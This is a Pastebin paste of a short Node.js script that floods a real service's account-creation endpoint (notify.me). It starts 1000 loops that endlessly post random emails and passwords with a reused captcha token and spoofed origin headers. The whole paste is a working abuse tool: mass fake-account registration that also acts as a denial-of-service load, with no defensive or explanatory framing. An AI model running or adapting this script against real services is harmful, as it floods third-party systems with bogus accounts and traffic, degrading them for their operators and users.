Advertisement
Guest User

Untitled

a guest
Dec 16th, 2018
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. const fetch = require('node-fetch');
  2.  
  3. function NiceFucker() {
  4. let xb = () => {
  5. let bodyObj = {
  6. email: Math.random().toString(36).substring(2, 15) + '@' + Math.random().toString(36).substring(2, 15) + '.com',
  7. password: Math.random().toString(36).substring(2, 15),
  8. captcha: 'QSCPwhf5I0qew8vhMf17_mT944mS1GPZ5AQmFC84mwvxKBW5svG33m6bgtI1SkLaGHM4LRiK4vC047AmKYVn7oZ87hieQonQgvBrH52m0YCchFDAfnz3CK-EvkO6BlHvt0rRgYXzd_K14Dzd8sDUsuVMzLU7R6WVc5dR5kZxjU2Aqe-3zwX7F_i2_CuK5KY2YTBOiplh55iAY8iUSEM20crZPMmuS3qXpZmwSXHC6x7HP8roHXHYXoAEy2Utu6no_K0-zF'
  9. };
  10.  
  11. fetch('https://api.notify.me/auth/create', {
  12. method: 'post',
  13. headers: {
  14. 'Content-Type': 'application/json; charset=utf-8',
  15. 'referer': 'https://notify.me/create',
  16. 'origin': 'https://notify.me'
  17. },
  18. body: JSON.stringify(bodyObj)
  19. })
  20. // .then(resp => resp.text())
  21. .then(resp => {
  22. // console.log(resp);
  23. xb();
  24. })
  25. .catch(err => xb());
  26. }
  27.  
  28. xb();
  29. }
  30.  
  31. for(let i = 0; i < 1000; i++) {
  32. new NiceFucker();
  33. }
  34.  
  35. setTimeout(() => {
  36. process.exit(0);
  37. }, 30000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement